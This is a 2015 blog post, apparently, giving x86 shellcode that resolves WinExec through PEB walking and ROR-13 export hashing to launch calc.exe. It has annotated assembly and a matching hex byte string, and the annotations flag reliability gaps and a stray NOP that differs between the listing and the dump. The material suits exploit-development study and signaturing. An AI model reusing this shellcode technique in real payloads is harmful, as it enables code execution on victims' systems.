WinExec calc.exe universal shellcode

Written by  on August 21, 2015 

ASM:

;-----------------------------------------------------------------------
; Analyst annotation of the listing as posted (x86 32-bit, Intel syntax,
; OllyDbg-style bare hex immediates). The code is left byte-identical;
; the comments describe what each line does so the sample can be read,
; signatured and compared against the hex dump below it.
; Stage 1: PEB -> Ldr -> InInitializationOrderModuleList, second entry,
;          taken as a module base (the author's comment expects kernel32).
; Stage 2: walk that module's export name table, hashing each name with
;          ROR-13 until the hash equals EBX, then name index -> ordinal
;          -> function RVA.
; Stage 3: build "calc.exe\0" on the stack and call the resolved address.
; Register roles: EBP = module base, EDI = export directory VA,
;          ECX = export name index, EDX = running hash, EBX = target hash.
; NOTE(review): which module is second in the init-order list differs
;          across Windows versions; the "universal" claim in the title
;          should be confirmed per target build rather than assumed.
;-----------------------------------------------------------------------
PUSH ESI                            ; preserve ESI across the LODS below
XOR EAX,EAX
MOV EAX,DWORD PTR FS:[EAX+30]       ; EAX = PEB (TEB+0x30)
MOV EAX,DWORD PTR DS:[EAX+C]        ; EAX = PEB->Ldr
MOV ESI,DWORD PTR DS:[EAX+1C]       ; ESI = InInitializationOrderModuleList.Flink (first entry)
LODS DWORD PTR DS:[ESI]             ; EAX = first entry's Flink, i.e. the second entry
MOV EAX,DWORD PTR DS:[EAX+8]        ; EAX = that entry's DllBase (+8 from its init-order links)
POP ESI
MOV EBP,EAX                         ; EBP = module base for the rest of the code
MOV EBX,F4C07457                    ; target hash; the author states it is ROR-13 of "WinExec"
XOR ECX,ECX                         ; ECX = export name index, starts at 0
MOV EDI,DWORD PTR SS:[EBP+3C]       ; EDI = e_lfanew (RVA of the PE header)
MOV EDI,DWORD PTR SS:[EBP+EDI+78]   ; EDI = DataDirectory[0] (export directory) RVA, PE32 layout
ADD EDI,EBP                         ; EDI = export directory VA
next_function_pointer:              ; outer loop: one export name per iteration
MOV EDX,DWORD PTR DS:[EDI+20]       ; EDX = AddressOfNames RVA
ADD EDX,EBP
MOV ESI,DWORD PTR DS:[EDX+ECX*4]    ; ESI = RVA of name[ECX]
ADD ESI,EBP                         ; ESI = VA of the name string
XOR EAX,EAX
CDQ                                 ; EDX = 0 (hash accumulator), sign-extended from EAX = 0
hash_next_byte:                     ; inner loop: hash = ROR(hash,13) + byte; the NUL byte is included
LODS BYTE PTR DS:[ESI]
ROR EDX,0D
ADD EDX,EAX
TEST AL,AL
JNZ SHORT hash_next_byte
INC ECX                             ; advance to the next name before the compare
CMP EDX,EBX
JNZ SHORT next_function_pointer     ; no upper bound on ECX: a missing name walks past the table
DEC ECX                             ; back to the index of the matching name
MOV EBX,DWORD PTR DS:[EDI+24]       ; EBX = AddressOfNameOrdinals RVA
ADD EBX,EBP
MOV CX,WORD PTR DS:[EBX+ECX*2]      ; CX = ordinal[index]; assumes index < 0x10000 so ECX's upper half is already 0
MOV EBX,DWORD PTR DS:[EDI+1C]       ; EBX = AddressOfFunctions RVA
ADD EBX,EBP
MOV EAX,DWORD PTR DS:[EBX+ECX*4]    ; EAX = function RVA
ADD EAX,EBP                         ; EAX = function VA
MOV EBX,11111111                    ; EBX = 0, built in two steps so the encoding has no zero byte
XOR EBX,11111111
PUSH EBX                            ; string terminator
PUSH 6578652E                       ; ".exe"
PUSH 636C6163                       ; "calc" -> stack now holds "calc.exe\0"
MOV EDI,ESP                         ; EDI = pointer to the string
PUSH EDI                            ; second arg (uCmdShow) receives the pointer value, not an SW_* constant as the author's comment implies
PUSH EDI                            ; first arg (lpCmdLine)
CALL EAX                            ; stdcall call; the hex dump on this page has a 0x90 before FF D0 that this listing lacks

 

HEX:

\x56\x33\xC0\x64\x8B\x40\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40
\x08\x5E\x8B\xE8\xBB\x57\x74\xC0\xF4\x33\xC9\x8B\x7D\x3C\x8B\x7C
\x3D\x78\x03\xFD\x8B\x57\x20\x03\xD5\x8B\x34\x8A\x03\xF5\x33\xC0
\x99\xAC\xC1\xCA\x0D\x03\xD0\x84\xC0\x75\xF6\x41\x3B\xD3\x75\xE4
\x49\x8B\x5F\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5F\x1C\x03\xDD\x8B
\x04\x8B\x03\xC5\xBB\x11\x11\x11\x11\x81\xF3\x11\x11\x11\x11\x53
\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xFC\x57\x57\x90\xFF
\xD0

 

calc

 

Soon I'll be releasing a complete post about shellcode writing.

P-)

